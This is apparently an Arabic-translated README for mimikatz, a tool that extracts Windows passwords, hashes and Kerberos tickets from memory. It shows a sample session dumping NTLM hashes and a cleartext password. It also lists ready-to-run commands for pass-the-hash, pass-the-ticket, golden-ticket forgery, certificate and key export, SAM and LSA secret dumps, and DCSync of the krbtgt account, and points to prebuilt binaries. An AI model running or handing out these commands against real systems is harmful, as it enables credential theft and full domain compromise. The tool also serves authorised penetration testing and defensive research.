
أداة لاستخراج بيانات اعتماد ويندوز (كلمات المرور، التجزئات، تذاكر Kerberos) من الذاكرة وتنفيذ هجمات pass-the-hash وpass-the-ticket وgolden ticket.
mimikatz هو أداة صنعتها لتعلم C وإجراء بعض التجارب مع أمان Windows.
أصبح معروفًا الآن لاستخراج كلمات المرور بالنص الصريح، والتجزئات (hashes)، ورمز PIN، وتذاكر Kerberos من الذاكرة. يمكن لـ mimikatz أيضًا تنفيذ pass-the-hash أو pass-the-ticket أو بناء Golden tickets.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
لكن هذا ليس كل شيء! Crypto وTerminal Server وEvents ... الكثير من المعلومات في GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki أو على http://blog.gentilkiwi.com (بالفرنسية، نعم).
إذا كنت لا تريد بنائه، فالملفات التنفيذية متاحة على https://github.com/gentilkiwi/mimikatz/releases
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz يكون على شكل حل Visual Studio Solution وبرنامج تشغيل WinDDK (اختياري للعمليات الرئيسية)، لذا فإن المتطلبات الأساسية هي:
mimikatz وmimilib: Visual Studio 2010 أو 2012 أو 2013 for Desktop (2013 Express for Desktop مجاني ويدعم x86 و x64 - http://www.microsoft.com/download/details.aspx?id=44914)mimikatz driver وmimilove (ومنصة ddk2003): Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800يستخدم mimikatz نظام SVN للتحكم بالمصدر، ولكنه متاح الآن مع GIT أيضًا! يمكنك استخدام أي أدوات تريدها للمزامنة، حتى GIT المدمج في Visual Studio 2013 =)
Build / Build Solution (يمكنك تغيير البنية)mimikatz الآن مبنيًا وجاهزًا للاستخدام! (Win32 / x64 وحتى ARM64 إذا كنت محظوظًا)
MSB3073 بخصوص _build_.cmd وmimidrv، وذلك لأن برنامج التشغيل لا يمكن بناؤه بدون Windows Driver Kit 7.1 (WinDDK)، لكن mimikatz وmimilib سليمان.باستخدام منصة MSBuild الاختيارية هذه، يمكنك استخدام أدوات بناء WinDDK ووقت التشغيل الافتراضي msvcrt (ملفات تنفيذية أصغر، بدون تبعيات)
بالنسبة لهذه المنصة الاختيارية، فإن Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 وVisual Studio 2010 إلزاميان، حتى لو كنت تخطط لاستخدام Visual Studio 2012 أو 2013 بعد ذلك.
اتبع التعليمات:
رخصة CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
يحتاج mimikatz إلى القهوة لمواصلة التطوير:
gentilkiwi، يمكنك التواصل معي على Twitter ( @gentilkiwi ) أو عبر البريد ( benjamin [at] gentilkiwi.com )lsadump بالاشتراك مع Vincent LE TOUX، يمكنك التواصل معه عبر البريد ( vincent.letoux [at] gmail.com ) أو زيارة موقعه ( http://www.mysmartlogon.com )هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه لأمور سيئة!